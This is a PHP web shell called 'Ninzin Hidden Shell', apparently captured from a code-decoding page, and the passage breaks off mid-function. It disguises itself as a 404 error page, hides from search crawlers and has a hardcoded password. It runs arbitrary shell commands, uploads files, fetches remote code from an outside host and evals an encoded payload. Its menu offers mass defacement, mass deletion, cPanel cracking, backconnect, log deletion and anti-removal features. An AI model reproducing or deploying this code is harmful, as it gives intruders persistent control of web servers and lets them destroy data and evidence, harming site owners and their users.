\x9POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" class="up" style="width: 450px; cursor: pointer; border-color: #fff" required><br>\xa\x9<input type="submit" name="d" value="Lock!">
\x9</form></center><br>"; if (isset($_POST["url"])) { $url = $_POST["url"]; $pf = $_POST["pf"]; $d = $_POST["d"]; } if (isset($d)) { echo "<center><form method='post' target='_blank' action='{$url}' enctype='multipart/form-data'><input type='file' style='border-color: #fff' name='{$pf}'> <input type='submit' name='g' value='Upload'></form></form></center><br>
\x9</html>"; } } goto lIOqg; B1oFD: if (isset($_POST["upwkwk"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } if (isset($_POST["berkasnya"])) { $data = @file_put_contents($lokasi . "/" . $_FILES["berkas"]["name"], @file_get_contents($_FILES["berkas"]["tmp_name"])); if (file_exists($lokasi . "/" . $_FILES["berkas"]["name"])) { echo "File Uploaded ! <font color='gold'><i>" . $lokasi . "/" . $_FILES["berkas"]["name"] . "</i></font><br><br>"; } else { echo "<font color='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { die("Filename cannot be empty !"); } if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_POST["namalink"], @file_get_contents($_POST["darilink"])); if (file_exists($lokasi . "/" . $_POST["namalink"])) { echo "File Uploaded ! <font color='gold'><i>" . $lokasi . "/" . $_POST["namalink"] . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["bepas"])) { $bepasdata = $_POST["bepasdata"]; $bepasnama = $_POST["bepasnama"]; if ($bepasdata) { echo "string"; } @file_put_contents($lokasi . "/" . $bepasnama, $bepasdata); if (file_exists($lokasi . "/" . $bepasnama)) { echo "File Uploaded ! <font color='gold'><i>" . $lokasi . "/" . $bepasnama . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } } goto LpJr3; Dtjhn: echo "<a class="destroy_table" href="?path=" . $lokasi . "&lockshell=headshoot"><i class="fas fa-lock"></i> Lock Shell</a>"; goto UeoyL; NJYLE: echo "<a class="destroy_table" href="?path=" . $lokasi . "&massdelete=headshoot"><i class="fas fa-trash-alt"></i> Mass Delete</a>"; goto SqmYD; o5GuK: $sub = "subs" . "tr"; goto wm8VQ; a6132: $chm = "ch" . "m" . "od"; goto E0FxW; T1npO: $rd = "r" . "ou" . "nd"; goto wtNyg; FI5oJ: if (file_exists("/usr/bin/python2")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto K59SJ; Sy2Nn: $sts = "s" . "trip" . "slash" . "es"; goto zZT6g; OdrQY: function cekwrite($lokasi) { $izin = substr(sprintf("%o", fileperms($lokasi)), -4); if (is_writable($lokasi)) { return "<font color=green>" . $izin . "</font>"; } else { return "<font color=red>" . $izin . "</font>"; } } goto fHa7N; KMLsg: $srl = "st" . "r_r" . "ep" . "la" . "ce"; goto pWNY4; M172M: function statusnya($file) { $izin = substr(sprintf("%o", fileperms($file)), -4); return $izin; } goto ScuEY; E5N6B: $ifi = "i" . "s_fi" . "le"; goto o5GuK; gQReF: if ($isw($euybrekw)) { echo "<font color="green">"; } elseif (!$isr($euybrekw)) { echo "<font color="red">"; } goto e5iX1; DvHE_: $ird = "is" . "_rea" . "da" . "ble"; goto mCni8; UeoyL: echo "<a class="destroy_table" href="?path=" . $lokasi . "&antikillshell=headshoot"><i class="fas fa-lock"></i> Anti Delete Shell</a>"; goto zmjIK; m7OOJ: echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>"; goto BHQD_; aLxFY: $fnct = "fu" . "nc" . "tion" . "_exi" . "sts"; goto RyRkz; uXLCq: if (function_exists("curl_init")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto JwZiV; zZT6g: $scd = "sc" . "a" . "nd" . "ir"; goto rTGrb; r3ubz: if (file_exists("/usr/bin/wget")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto K15ms; gQcC8: $lokasinya = @scandir($lokasi); goto Jketo; vesdy: ini_set("display_errors", 1); goto z5F0D; A0cMJ: function exe($cmd) { if (function_exists("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("exec")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("passthru")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("shell_exec")) { $buff = @shell_exec($cmd); return $buff; } } goto usZaD; jEwWG: $bypass_root = "wIAonkAOTU3sK/T1OwnOzB0yvqYnjzbaAgtzpKswuoLZ091WZznmf+5ZzgEFHOO8XAddEM9XXnYtb28++Ti8N+LaBWAYYjuSyeBK75j5B3CzT8fPum7ifbE2nPDSTXxBnoZBtFJL5gU0bcSXBWpKgqav7Sk+Yy+4KMujVssoQEMFmJ5mrJgziyvLYEGmuDKoEiC5ph8+of5RouQwhc0CiP57/VGwO3pe1skAuYEWU8qRgiGjycGktzIADj5F2RKBV+EfzXZaegwelAl6jwwbLE25Ud47MKAYToRLxlOVdONiyAgy3KeID9urJKTThctVtIgR6U9hR0TYrEkDajp0CnE6CNxlv4MkN0b86ENWQM6NE0CnGRtUQZhPIMcD2PRWV9gd3FxPGZPmecONVdO90byIAM3DBPD+uE5Gv9iy3DE4YmbsWGWTXvOlzBaiy7/+/Ql8N/bnaOl9I3vg8RUuJBSN4nZzCb2WI2ClmsuoPj5tJI8wd81bZkdpiwh024XXOMtxeViUE7KkRyK9VtuAUM6IL7OUNFelpcenRSMWUB+dh99zHECfXNORcU5SBmGMyF31BwH1BU37KrTUjcaPvpXKjraKm+e5GohbQIpOadpcdYWcqPAsZu4MXqzKrhq0ZVfTn0Q6iOgU7MwMZ1YQVHhjLsbgVwRYmXKyFm2nAFKgF11GKadmE2JfkPjFcQqcZ6U6wZDfW8pmlsTxnr1qnru93Ml+ouX/z4FLEHlz/7UYtJacTn2eaRvGzdckuzcOWL+I3z9y4I7qJniJCBjte+5HCZrhhPKxMTU2BaTg6ae/VFzI0qdXz1IW6IyxecB77ucJ56SprycQ+ipARtdn0nrLvz4bW+hxsreetEZeC+FPwti7sjR="; goto MVaRk; dOhM1: echo "<a class="destroy_table" href="?path=" . $lokasi . "&zoneh=headshoot"><i class="fas fa-theater-masks"></i> Zone-H</a>"; goto UHequ; SfLkK: echo "<div class="d-flex justify-content-center flex-wrap" align="center">"; goto ROUPh; qMfEO: echo "<a class="destroy_table" href="?path=" . $lokasi . "&createrdp=headshoot"><i class="fas fa-laptop-house"></i> Create Rdp</a>"; goto LSJjQ; fqj3p: if (file_exists("/usr/bin/perl")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto kyL3_; kdzPb: echo "<a class="destroy_table" href="?path=" . $lokasi . "&about=headshoot"><i class="fas fa-info"></i> About Me</a>"; goto mzgWT; fSh9Y: echo "</td></tr><tr><td>"; goto B1oFD; mzgWT: echo "<a class="destroy_table" href="?path=" . $lokasi . "&kill=headshoot"><i class="fas fa-skull"></i> Remove Shell</a>"; goto h8OHw; kyhLX: function gor($fl) { $a = "fun" . "cti" . "on_" . "exis" . "ts"; $b = "po" . "s" . "ix_" . "get" . "pwu" . "id"; $c = "fi" . "le" . "o" . "wn" . "er"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b($c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d["name"]; } } elseif ($a($c)) { return $c($fl); } else { return "?"; } } goto uW31K; hElda: function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === FALSE) { return FALSE; } if (strpos($param, $kata2) === FALSE) { return FALSE; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } goto OdrQY; u2Drw: echo "<a class="destroy_table" href="?path=" . $lokasi . "&phpmailer=headshoot"><i class="fas fa-envelope"></i> Mailer </a>"; goto z1jI2; pWNY4: $sps = "st" . "rp" . "os"; goto zYney; Tudk2: echo "<tr>"; goto xnKOj; K15ms: echo " | Perl : "; goto fqj3p; zYney: $mkd = "m" . "kd" . "ir"; goto Frj1p; iYqNm: function cekfile($file) { return "<i class="fa fa-file" style="color: #d6d4ce"></i> "; } goto aPXjj; V3Qkr: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?path=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto fSh9Y; aPXjj: function filedate($file) { return date("F d Y g:i:s", filemtime($file)); } goto vKzed; xO4gP: author(); goto M172M; wm8VQ: $spr = "sp" . "ri" . "ntf"; goto GB8gY; BHQD_: echo "Disable Function : " . $disf . "</font><br>"; goto PkrsF; FrfAB: $ulk = "un" . "li" . "nk"; goto E5N6B; y0HyE: header("X-XSS-Protection: 0"); goto vesdy; tl8xe: function cekdir() { if (isset($_GET["path"])) { $lokasi = $_GET["path"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto UYsIL; kyL3_: echo " | Python : "; goto FI5oJ; Tk20e: echo "Total HDD : <font color='gold'>" . $total . " </font>/ Free: <font color='gold'>" . $freespace . " </font><br>"; goto Ai93F; ZjnKZ: $idi = "i" . "s_d" . "ir"; goto FrfAB; dL1gv: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto ZtTTW; Lu2xc: foreach ($lokasinya as $dir) { $euybre = $lokasi . "/" . $dir; $euybre = $srl("//", "/", $euybre); if (!$idi($euybre) || $dir == "." || $dir == "..") { continue; } echo "<tr>"; echo "<td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href="?path=" . $euybre . "">" . $dir . "</a></td>\xa <td><center>--</center></td>\xa <td><center>" . fdt($euybre) . "</center></td>\xa\x9<td><center>" . gor($euybre) . " / " . ggr($euybre) . "</center></td>
\x9<td><center>"; if ($isw($euybre)) { echo "<font color="green">"; } elseif (!$isr($euybre)) { echo "<font color="red">"; } echo statusnya($euybre); if ($isw($euybre) || !$isr($euybre)) { echo "</font>"; } echo "</center></td>
\x9<td><center><form method="POST" action="?pilihan&path={$lokasi}">
<input type="hidden" name="type" value="dir">\xa\x9<input type="hidden" name="name" value="{$dir}">
<input type="hidden" name="path" value="{$lokasi}/{$dir}">\xa <button type='submit' class='btf' name='pilih' value='gantinama'><i class='fa fa-pen' style='color: #fff'></i></button>
\x9<button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button>\xa <button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fa fa-cogs' style='color: #fff'></i></button>\xa\x9<button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button>\xa\x9</form></center></td>
</tr>"; } goto kk5vw; e5iX1: echo statusnya($euybrekw); goto y1wXQ; wtNyg: $igt = "in" . "i_g" . "et"; goto aLxFY; y97T_: echo "</tr></td></table></table>"; goto xO4gP; fn_SB: function hdd($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto A0cMJ; K59SJ: echo " | Java : "; goto oT752; XZTh7: if (function_exists("mysql_connect")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto t6Qj9; Hfsd7: $fgt = "f" . "ile_g" . "et_c" . "onten" . "ts"; goto Sy2Nn; dHFJs: echo "<a class="destroy_table" href="?path=" . $lokasi . "&backconnect=headshoot"><i class="fas fa-network-wired"></i> Network</a>"; goto qMfEO; E0FxW: $ocd = "oc" . "td" . "ec"; goto NdWei; qVBBG: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto X_Ch1; NTU1c: $used = "{$total} - {$freespace}"; goto eZqHv; z5F0D: ini_set("display_startup_errors", 1); goto MQrxV; AyolC: error_reporting(E_ALL); goto nwKbR; LpJr3: echo "</table><br>"; goto VvLMe; MQrxV: ob_start(); goto AyolC; Frj1p: $disfunc = @ini_get("disable_functions"); goto T1l3Y; mvAZG: if (isset($_REQUEST["logout"])) { session_destroy(); echo "<script>window.location='?'</script>"; } goto xxh4f; LSJjQ: echo "<a class="destroy_table" href="?path=" . $lokasi . "&hasgen=headshoot"><i class="fas fa-cash-register"></i> Hash Generator</a>"; goto dOhM1; kk5vw: echo "<tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr>"; goto H5oCk; H5oCk: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}/{$file}")) { continue; } $size = filesize("{$lokasi}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>\xa<td>" . cekfile($lokasi . "/" . $file) . "<a href="?fileloc={$lokasi}/{$file}&path={$lokasi}">{$file}</a></td>\xa<td><center>" . $size . "</center></td>
<td><center>" . filedate($lokasi . "/" . $file) . "</center></td>\xa<td><center>" . gor($euybre) . " / " . ggr($euybre) . "</center></td>\xa<td><center>"; if (is_writable("{$lokasi}/{$file}")) { echo "<font color="green">"; } elseif (!is_readable("{$lokasi}/{$file}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$file}"); if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>
<form method="post" action="?pilihan&path={$lokasi}">
<button type='submit' class='btf' name='pilih' value='edit'><i class='fa fa-edit' style='color: #fff'></i></button>\xa<button type='submit' class='btf' name='pilih' value='gantinama'><i class='fas fa-pen' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fas fa-cogs' style='color: #fff'></i></button>\xa<button type='submit' class='btf' name='pilih' value='dunlut'><i class='fa fa-down" . "load' style='color: #fff'></i></button>\xa<button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button>"; if (class_exists("ZipArchive")) { echo "<button type='submit' class='btf' name='pilih' value='unzip'><i class='fas fa-file-archive' style='color: #fff'></i></button>"; } echo "\xa<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="{$file}">\xa<input type="hidden" name="path" value="{$lokasi}/{$file}">\xa</form></center></td>
</tr>"; } goto y97T_; rhtoy: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto zKur1; hJYjD: echo "User : <font color='gold'>" . @get_current_user() . " </font>( <font color='gold'>" . @getmyuid() . "</font>) Group: <font color='gold'>" . $group . " </font>( <font color='gold'>" . @getmygid() . "</font>)<br>"; goto Tk20e; t6Qj9: echo " | cURL : "; goto uXLCq; mCni8: $isr = "is_" . "re" . "adab" . "le"; goto IreJh; NdWei: $isw = "i" . "s_wr" . "itab" . "le"; goto RYW2E; z1jI2: echo "<a class="destroy_table" href="?path=" . $lokasi . "&csrfup=headshoot"><i class="fas fa-file-import"></i> CSRF Exploit</a>"; goto Dtjhn; ijH8y: echo "<a class="destroy_table" href="?path=" . $lokasi . "&upload=headshoot"><i class="fas fa-cloud-upload-alt"></i> Upload File</a>"; goto cMCJ5; oT752: if (file_exists("/usr/bin/java")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto dL1gv; PkrsF: echo "MySQL : "; goto XZTh7; Jketo: echo "<br>Directory (" . cekwrite($lokasi) . ") : "; goto V3Qkr; hAab2: function green($text) { echo "<center><font color='green'>" . $text . "</center></font>"; } goto qVBBG; H8RuD: $bsn = "ba" . "se" . "na" . "me"; goto KMLsg; ZtTTW: if (isset($_GET["path"])) { $lokasi = $_GET["path"]; $lokdua = $_GET["path"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto EgDii; nwKbR: echo "\xa<!DOCTYPE html>\xa<html>
<head>\xa <title>404 Not Found</title>
<meta name='author' content='Ninzinjp'>
<meta name='viewport' content='width=device-width, initial-scale=1' />
<meta name='description' content='ninzin shell bypass !'>\xa <meta property='og:description' content='ninzin shell bypass !'>
<meta property='og:image' content='https://i.ibb.co/QHLs3Tt/yunjin.jpg'>
<link rel='icon' href='https://i.ibb.co/QHLs3Tt/yunjin.jpg'>
<link rel='shortcut icon' href='https://i.ibb.co/QHLs3Tt/yunjin.jpg'>
<meta name='robots' content='noindex'>
<meta name='googlebot' content='noindex'>
<meta name='theme-color' content='#1f1f1f'>
</head>
<body bgcolor='#1f1f1f' text='#ffffff'>\xa<link href='' rel='stylesheet' type='text/css'>\xa<link href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css' rel='stylesheet'>\xa<style>\xa @import url('https://fonts.googleapis.com/css?family=Dosis');
@import url('https://fonts.googleapis.com/css?family=Trade+Winds');
@import url('https://fonts.googleapis.com/css?family=Bungee+Outline');
@import url('https://fonts.googleapis.com/css?family=Silkscreen');
@import url('https://fonts.googleapis.com/css?family=Bungee');\xabody {
font-family: 'Dosis', cursive;
text-shadow:0px 0px 1px #757575;\xa}\xa
body::-webkit-scrollbar {
width: 12px;\xa
}
\xabody::-webkit-scrollbar-track {\xa background: #1f1f1f;\xa}\xa
body::-webkit-scrollbar-thumb {
background-color: #1f1f1f;\xa border: 3px solid gray;
}\xa\xa#content tr:hover {\xa background-color: #636263;\xa text-shadow:0px 0px 10px #fff;\xa}\xa\xa#content .first {\xa background-color: #25383C;\xa}
\xa#content .first:hover {\xa background-color: #25383C
text-shadow:0px 0px 1px #757575;
}
\xatable {\xa border: 1px #000000 dotted;\xa table-layout: fixed;
word-break: break-all;
}
\xatextarea {
max-width: 95%;
max-height: 100%;
resize: none;\xa outline: none;\xa overflow: auto;\xa background: transparent;
color: #fff;\xa}\xa
textarea::-webkit-scrollbar {
width: 12px;\xa}\xa
textarea::-webkit-scrollbar-track {
background: #1f1f1f;\xa}\xa\xatextarea::-webkit-scrollbar-thumb {
background-color: #1f1f1f;
border: 3px solid gray;\xa}
\xaa {\xa color: #ffffff;\xa text-decoration: none;
}
\xaa:hover {
color: gold;
text-shadow:0px 0px 10px #ffffff;\xa}
\xainput,select,textarea {
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.gas {
background-color: #1f1f1f;
color: #ffffff;
cursor: pointer;\xa}\xa\xa.btf {
background: transparent;\xa\x9border: 1px #fff solid;\xa cursor: pointer;\xa}\xa
select {
background-color: transparent;
color: #ffffff;
}\xa
select:after {\xa cursor: pointer;\xa}
.linka {\xa background-color: transparent;
color: #ffffff;\xa}
.up {
background-color: transparent;
color: #fff;
}\xa\xa.destroy_table {;
background:transparent;\xa position:relative;
padding:3px;\xa margin:0px;\xa border:1px solid white;
font-family:Dosis;
display:inline-block;
cursor:pointer;
color:white;
font-size:17px;\xa font-weight:bold;\xa padding:3px 20px;\xa text-decoration:white;\xa text-shadow:0px 0px 0px #ff0505;\xa}
\xaoption {\xa background-color: #1f1f1f;
}\xa
::-webkit-file-upload-button {
background: transparent;\xa color: #fff;\xa border-color: #fff;\xa cursor: pointer;
}
</style>
<script>\xafunction setfilename(val)\xa {
filename = val.split('\').pop().split('/').pop();\xa //filename = filename.substring(0, filename.lastIndexOf('.'));
document.getElementById('namanya').value = filename;\xa }
\xaasync function loadFile(file) {
let text = await file.text();\xa document.getElementById('bepasdata').innerHTML = text;\xa}\xa</script>\xa<center>
<font face='Trade Winds' size='6'>Ninzin Hidden Shell</font></center>\xa<img src='https://i.ibb.co/x2Wz44j/ninzinjp.jpg' style='position: absolute; top: 50px; right: 20px; border-radius: 50%; border-color: black;' width='210' border='2' height='210'>\xa<table width='100%' border='0' cellpadding='3' cellspacing='1' align='center'>\xa<tr><td>"; goto jEwWG; X_Ch1: $group = "?"; goto AnxrV; YSYov: echo "Web Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto NkEgn; iXP_6: echo "</div>"; goto CxEzp; GB8gY: $fp = "fil" . "epe" . "rms"; goto a6132; d5Nl3: echo "<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Last Modified</center></td>
<td><center>Owner / Group</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>\xa</tr>"; goto Tudk2; EgDii: $lokasi = str_replace("\", "/", $lokasi); goto agdM1; S5rvq: function fdt($fl) { $a = "da" . "te"; $b = "fil" . "emt" . "ime"; return $a("F d Y H:i:s", $b($fl)); } goto kyhLX; E8VnX: function ipserv() { if (empty($_SERVER["SERVER_ADDR"])) { return gethostbyname($_SERVER["SERVER_NAME"]); if (empty(gethostbyname($_SERVER["SERVER_NAME"]))) { return $_SERVER["SERVER_NAME"]; } } else { return $_SERVER["SERVER_ADDR"]; } } goto iYqNm; usZaD: function author() { echo "<center><br>Made with \342\x99\xa5\xef\xb8\217 From Ninzin</center>"; die; } goto S5rvq; O2SSS: if (!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])) { if (empty($password) || isset($_POST["password"]) && base64_encode($_POST["password"]) == $password) { $_SESSION[md5($_SERVER["HTTP_HOST"])] = true; } else { login_shell(); } } goto y0HyE; cMCJ5: echo "<a class="destroy_table" href="?path=" . $lokasi . "&massdeface=headshoot"><i class="fas fa-poo-storm"></i> Mass Deface</a>"; goto NJYLE; EYdlW: function owner($file) { if (function_exists("posix_getpwuid")) { $tod = @posix_getpwuid(fileowner($file)); return "<center>" . $tod["name"] . "</center>"; } else { return "<center>" . fileowner($file) . "</center>"; } } goto hElda; xxh4f: $password = "eHpvdXJ0MTIz"; goto tyq0E; y1wXQ: if ($isw($euybrekw) || !$isr($euybrekw)) { echo "</font>"; } goto lm9_W; NkEgn: echo "System : <font color='gold'>" . php_uname() . "</font><br>"; goto hJYjD; UHequ: echo "<a class="destroy_table" href="?path=" . $lokasi . "&adminer=headshoot"><i class="fas fa-database"></i> Adminer</a>"; goto u2Drw; tyq0E: function login_shell() { ?>
<!doctypehtml><html><head><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><style>input{margin:0;background-color:#fff;border:1px solid #fff;text-align:center}</style><br><br><br><br><br><form method="post"><br><br><center><input autocomplete="off"name="password"type="password"></form><?php die; } goto O2SSS; bDGIE: error_reporting(0); goto aZYKL; WhxNt: echo "</div>"; goto iXP_6; T1l3Y: if (empty($disfunc)) { $disf = "<font color='gold'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto fn_SB; aZYKL: header("HTTP/1.0 404 Not Found", true, 404); goto hPJ3K; AjOag: $fpt = "fi" . "le_p" . "ut_co" . "nte" . "nts"; goto Hfsd7; qC3XU: echo "</tr>"; goto Lu2xc; Ai93F: echo "Time : <font color='gold'>" . date("d M Y H:i:s", time()) . " </font><br>"; goto m7OOJ; m6yLj: echo "<td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href="?path=" . $euybrekw . "">..</a></td>\xa<td><center>--</center></td>
<td><center>" . fdt($euybrekw) . "</center></td>
<td><center>" . gor($euybrekw) . " / " . ggr($euybrekw) . "</center></td>
<td><center>"; goto gQReF; xnKOj: $euybrekw = $srl($bsn($lokasi), '', $lokasi); goto zRnLc; CYemH: $rpt = "re" . "al" . "pa" . "th"; goto H8RuD; agdM1: $lokasis = explode("/", $lokasi); goto gQcC8; y2_cD: echo "<a class="destroy_table" href="?path=" . $lokasi . "&moretools=headshoot"><i class="fas fa-tools"></i> More Tools</a>"; goto kdzPb; AnxrV: $freespace = hdd(disk_free_space("/")); goto C6XDb; rTGrb: $fxt = "fi" . "le_" . "exis" . "ts"; goto ZjnKZ; zKur1: function dunlut($file) { if (!is_readable($file)) { red("Cannot Download File / Unreadable File !"); die; } @ob_clean(); header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } goto EYdlW; MVaRk: eval(gzinflate(base64_decode(str_rot13($bypass_root)))); goto AjOag; h8OHw: echo "<a class="destroy_table" href="?path=" . $lokasi . "&logout=headshoot"><i class="fas fa-sign-out-alt"></i> Logout</a>"; goto WhxNt; ROUPh: echo " <a class="destroy_table" href="" . $_SERVER["SCRIPT_NAME"] . ""><i class="fas fa-home"></i> Home</a>"; goto Du9kO; yuM3I: if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } goto mvAZG; UYsIL: function cekroot() { if (is_writable($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto rhtoy; Njo2H: echo "<a class="destroy_table" href="?path=" . $lokasi . "&delete_logs=headshoot"><i class="fas fa-trash"></i></i> Delete Logs</a>"; goto y2_cD; fHa7N: function ekse($komend, $lokasi) { if (!function_exists("proc_open")) { die("proc_open function disabled !"); } elseif (!function_exists("base64_decode")) { die("base64_decode function disabled !"); } $komen = base64_decode(base64_decode(base64_decode($komend))); if (strpos($komend, "2>&1") === false) { $komen = base64_decode(base64_decode(base64_decode($komend))) . " 2>&1"; } $tod = @proc_open($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pipes, $lokasi); echo "<textarea rows='25' cols='100'>" . htmlspecialchars(stream_get_contents($pipes[1])) . "</textarea><br><br>"; } goto E8VnX; SqmYD: echo "<a class="destroy_table" href="?path=" . $lokasi . "&cpcrack=headshoot"><i class="fas fa-key"></i> Cpanel Crack</a>"; goto dHFJs; RYW2E: $idr = "i" . "s_d" . "ir"; goto DvHE_; hPJ3K: session_start(); goto yuM3I; ScuEY: ?>
Did this file decode correctly?
Original Code
<? goto bDGIE; vKzed: function unzip($file, $lokasi) { if (!is_readable($file)) { red("Cannot Unzip File / Unreadable File !"); die; } elseif (strpos(file_get_contents($file), "PK\3\4") === false) { red("This isn't Zip File !"); die; } $zip = new ZipArchive(); $res = $zip->open($file); if ($res == true) { $zip->extractTo($lokasi); $zip->close(); green("Success Unzip File !"); } else { red("Failed to Unzip File !"); } } goto hAab2; Du9kO: echo "<a class="destroy_table" href="?path=" . $lokasi . "&komend=headshoot"><i class="fas fa-terminal"></i> C0mmand</a>"; goto ijH8y; VvLMe: echo "<div class="text-center">"; goto SfLkK; uW31K: function ggr($fl) { $a = "fun" . "cti" . "on_" . "exis" . "ts"; $b = "po" . "si" . "x_ge" . "tgr" . "gid"; $c = "fi" . "le" . "gro" . "up"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b($c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d["name"]; } } elseif ($a($c)) { return $c($fl); } else { return "?"; } } goto tl8xe; CxEzp: echo "</table><br>"; goto s5p3N; C6XDb: $total = hdd(disk_total_space("/")); goto NTU1c; zRnLc: $euybrekw = $srl("//", "/", $euybrekw); goto m6yLj; RyRkz: $rad = "RE" . "M" . "OTE_AD" . "DR"; goto CYemH; IreJh: $fsz = "fi" . "lesi" . "ze"; goto T1npO; JwZiV: echo " | WGET : "; goto r3ubz; lIOqg: if (!is_readable($lokasi)) { die("<center>This directory is unreadable :(</center>"); } elseif (isset($_GET["adminer"])) { $dir = $_GET["path"]; $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("adminer.php")) { echo "<center><a href='{$full}/adminer.php' target='_blank'><font color='green'> ===>>> Adminer Login <<<=== </a></font></center><br/>"; } else { if (adminer("https://shell.prinsh.com/Nathan/adminer.txt", "adminer.php")) { echo "<center><a href='{$full}/adminer.php' target='_blank'><font color='green'> ===>>> Adminer Login <<<=== </a></font></center><br/>"; } else { echo "<center><font color=red>Gagal Membuat File Adminer</font></center><br/>"; } } die; } elseif (isset($_GET["phpmailer"])) { $dir = $_GET["path"]; $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $dir); function phpmailer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 